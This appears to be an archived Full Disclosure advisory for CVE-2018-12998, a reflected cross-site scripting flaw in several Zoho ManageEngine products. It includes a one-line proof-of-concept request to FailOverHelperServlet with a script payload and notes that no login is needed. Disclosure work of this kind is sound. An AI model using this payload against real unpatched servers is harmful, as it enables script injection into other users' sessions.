Full Disclosure mailing list archives
[CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products
From: "xiaotian.wang"<xiaotian.wang () dbappsecurity com cn>
Date: Fri, 20 Jul 2018 14:24:56 +0800
This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me ========================== Advisory: Zoho manageengine Reflected XSS in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script Notice: This vul can reproduce without login.
Attachment:
4444.png
Description:
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- [CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products xiaotian.wang (Jul 20)